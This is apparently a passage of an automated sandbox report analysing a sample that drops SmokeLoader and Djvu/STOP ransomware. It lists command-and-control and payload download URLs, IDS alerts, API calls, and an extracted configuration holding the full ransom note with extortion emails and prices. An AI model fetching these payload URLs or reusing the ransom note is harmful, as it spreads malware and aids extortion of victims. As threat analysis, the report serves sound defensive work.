tlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	14_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	14_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: EnumSystemLocalesW,	14_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	14_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	14_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	14_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	14_2_00437F83

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 8_2_00409292 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_00409292

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

9_2_0042FE47

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00419F90

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: explorer.exe, 0000001E.00000002.3273089936.000000000C029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3082332042.000000000C084000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3097253070.000000000C081000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3091807720.000000000C081000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3080057918.000000000C084000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3096887888.000000000C029000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3122156074.000000000C081000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3103821447.000000000C084000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3075737405.000000000C081000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3122022026.000000000C029000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.92.253.69	unknown	Bulgaria	34368	THEZONEBG	true
185.154.13.143	unknown	Ukraine	204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	true
188.114.97.3	api.2ip.ua	European Union	13335	CLOUDFLARENETUS	false
103.174.152.66	safeautomationbd.com	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
192.185.16.114	nessotechbd.com	United States	46606	UNIFIEDLAYER-AS-1US	true
162.159.129.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	true
158.160.165.129	trad-einmyus.com	Venezuela	721	DNIC-ASBLK-00721-00726US	true
104.196.109.209	transfer.adttemp.com.br	United States	15169	GOOGLEUS	false
189.195.132.134	sdfjhuz.com	Mexico	13999	MegaCableSAdeCVMX	true
187.170.192.109	cajgtus.com	Mexico	8151	UninetSAdeCVMX	true
193.233.132.167	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true

Contacted Domains

Name	IP	Active
safeautomationbd.com	103.174.152.66	true
sdfjhuz.com	189.195.132.134	true
cajgtus.com	187.170.192.109	true
transfer.adttemp.com.br	104.196.109.209	true
nessotechbd.com	192.185.16.114	true
cdn.discordapp.com	162.159.129.233	true
api.2ip.ua	188.114.97.3	true
trad-einmyus.com	158.160.165.129	true
www.safeautomationbd.com	unknown	unknown
157.123.68.40.in-addr.arpa	unknown	unknown
171.39.242.20.in-addr.arpa	unknown	unknown
api.msn.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://trade-inmyus.com/index.php	true	URL Reputation: safe	unknown
http://91.92.253.69/wek.exe	true	Avira URL Cloud: safe	unknown
http://tradein-myus.com/index.php	true	URL Reputation: safe	unknown
http://193.233.132.167/lend/jfesawdr.exe	true	Avira URL Cloud: malware	unknown
http://sdfjhuz.com/dl/buildz.exe	true	Avira URL Cloud: malware	unknown
https://nessotechbd.com/TEMPradius.exe	true	Avira URL Cloud: malware	unknown
https://transfer.adttemp.com.br/get/Dztc3/3edag44.exe	false	Avira URL Cloud: safe	unknown
http://trad-einmyus.com/index.php	true	URL Reputation: safe	unknown
http://cajgtus.com/test1/get.php	true	Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63&	true	Avira URL Cloud: safe	unknown
http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54	true	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.json	false	Avira URL Cloud: safe	unknown
https://www.safeautomationbd.com/klok.exe	true	Avira URL Cloud: malware	unknown
http://185.154.13.143/feswad.exe	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: XVM5nluelx.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54e	Avira URL Cloud: Label: malware
Source: http://193.233.132.167/lend/jfesawdr.exe	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54-D	Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/q	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/buildz.exe	Avira URL Cloud: Label: malware
Source: https://nessotechbd.com/TEMPradius.exe	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54KS	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php	Avira URL Cloud: Label: malware
Source: https://www.safeautomationbd.com/klok.exe	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54L	Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/geo.jsondll	Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/geo.jsonM	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\dejcbcc	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Avira: detection malicious, Label: HEUR/AGEN.1311176

Found malware configuration

Source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0871PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\dejcbcc

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: XVM5nluelx.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\dejcbcc	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: XVM5nluelx.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	9_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	9_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	9_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	9_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	9_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00411178 CryptDestroyHash,CryptReleaseContext,	9_2_00411178
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	14_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	14_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	14_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	14_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	14_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00411178 CryptDestroyHash,CryptReleaseContext,	14_2_00411178

Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_a21241c9-6

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 9.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Unpacked PE file: 14.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 16.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 23.2.33A3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Unpacked PE file: 26.2.33A3.exe.400000.0.unpack

Uses 32bit PE files

Source: XVM5nluelx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: C:\Users\user\Desktop\XVM5nluelx.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50438 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.5:50442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50451 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.5:50454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50461 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:50470 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:50474 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 33A3.exe, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 33A3.exe, 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	9_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	14_2_00410160
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	14_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	14_2_0040FB98

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57636 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57637 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57638 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57639 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57640 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57641 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57642 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:57643 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50429 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50430 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50432 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50434 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50436 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50437 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50439 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50444 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50445 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50446 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50447 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50448 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.5:50449 -> 187.170.192.109:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50450 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 187.170.192.109:80 -> 192.168.2.5:50449
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50452 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50453 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50455 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50456 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50457 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50458 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50459 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50460 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50462 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50463 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50464 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50465 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:50466 -> 91.92.253.69:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50467 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50469 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50471 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:50473 -> 158.160.165.129:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.174.152.66 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 193.233.132.167 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.92.253.69 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.154.13.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.114 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.159.129.233 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.165.129 80	Jump to behavior
